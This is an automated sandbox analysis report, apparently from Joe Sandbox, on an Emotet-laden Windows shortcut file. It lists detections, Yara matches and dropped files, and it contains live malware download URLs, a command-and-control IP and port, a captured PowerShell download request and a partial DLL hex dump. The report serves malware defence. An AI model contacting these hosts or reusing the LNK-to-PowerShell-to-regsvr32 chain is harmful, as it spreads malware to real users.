Windows Analysis Report
Details.lnk

Overview

General Information

Sample Name: Details.lnk
Analysis ID: 632105
MD5: 4915772035b89b1e023e94626dbd8da9
SHA1: 8cf2652d3a1c37c488ced4f16a01a26f1e407087
SHA256: 4aaa9741e3fb2a63803214bfacd8a5f6e61de3c78612666124f746cf13957912
Tags: lnk
Infos:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Details.lnk ReversingLabs: Detection: 41%
Antivirus detection for URL or domain
Source: http://digitalkitchen.jp/images/PVn/ Avira URL Cloud: Label: malware
Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/ Avira URL Cloud: Label: malware
Source: http://piffl.com/piffl.com/a/ity. Avira URL Cloud: Label: malware
Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ Avira URL Cloud: Label: malware
Source: https://173.82.82.196:8080/ URL Reputation: Label: malware
Source: http://piffl.com/piffl.com/a/ Avira URL Cloud: Label: malware
Source: https://173.82.82.196/6 Avira URL Cloud: Label: malware
Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/ Avira URL Cloud: Label: malware
Source: https://173.82.82.196/~ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP ReversingLabs: Detection: 40%
Source: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy) Metadefender: Detection: 31% Perma Link
Source: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy) ReversingLabs: Detection: 40%
Machine Learning detection for sample
Source: Details.lnk Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP Joe Sandbox ML: detected
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose, 4_2_00000001800248B0

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.82.82.196 8080 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MULTA-ASN1US MULTA-ASN1US
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 173.82.82.196 173.82.82.196
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:54:31 GMTServer: ApacheX-Powered-By: PHP/5.6.40Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:54:31 GMTContent-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3db76983e=1653292471; expires=Mon, 23-May-2022 07:55:31 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:54:31 GMTContent-Length: 365056Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=40Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhk
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49788 -> 173.82.82.196:8080
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: svchost.exe, 00000014.00000003.648339577.0000024B5DD67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000014.00000003.648339577.0000024B5DD67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
Source: powershell.exe, 00000002.00000002.477465133.0000021B763F8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540268618.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.702423111.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.703085340.0000011187C61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696586993.0000024B5DD00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000008.00000002.703085340.0000011187C61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696586993.0000024B5DD00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: regsvr32.exe, 00000004.00000003.540358165.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000003.540268618.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.702423111.0000000000A80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab_
Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://digitalkitchen.jp/images/PVn/
Source: svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://help.disneyplus.com.
Source: powershell.exe, 00000002.00000002.474725434.0000021B5EFFD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsonsintl.com
Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://piffl.com/piffl.com/a/
Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://piffl.com/piffl.com/a/ity.
Source: svchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.mic
Source: svchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: svchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enu
Source: powershell.exe, 00000002.00000002.459120911.0000021B5E3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.474725434.0000021B5EFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.com
Source: powershell.exe, 00000002.00000002.474736175.0000021B5F008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.com/
Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
Source: powershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.comx
Source: regsvr32.exe, 00000004.00000002.702313746.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196/6
Source: regsvr32.exe, 00000004.00000002.702313746.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196/~
Source: regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196:8080/
Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://disneyplus.com/legal.
Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.476380222.0000021B5F586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.477597514.0000021B76452000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nakharinitwebhosting.com/HSDYKN1X5GLF/
Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000014.00000003.671989281.0000024B5DD91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown DNS traffic detected: queries for: www.jsonsintl.com
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006B24 InternetReadFile, 4_2_0000000180006B24
Source: global traffic HTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 4.2.regsvr32.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.ad0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.472903307.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.702789437.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.472773711.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.702594070.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Details.lnk, type: SAMPLE Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 6976, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP Jump to dropped file
Yara signature match
Source: Details.lnk, type: SAMPLE Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 6976, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Creates files inside the system directory
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\PZgVlkJBEGfsjmei\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9F1AD0CB3 2_2_00007FF9F1AD0CB3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9F1AD1EE0 2_2_00007FF9F1AD1EE0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA12B0 3_2_00007FFA51CA12B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA4A70 3_2_00007FFA51CA4A70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA5E01 3_2_00007FFA51CA5E01
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA5CAD 3_2_00007FFA51CA5CAD
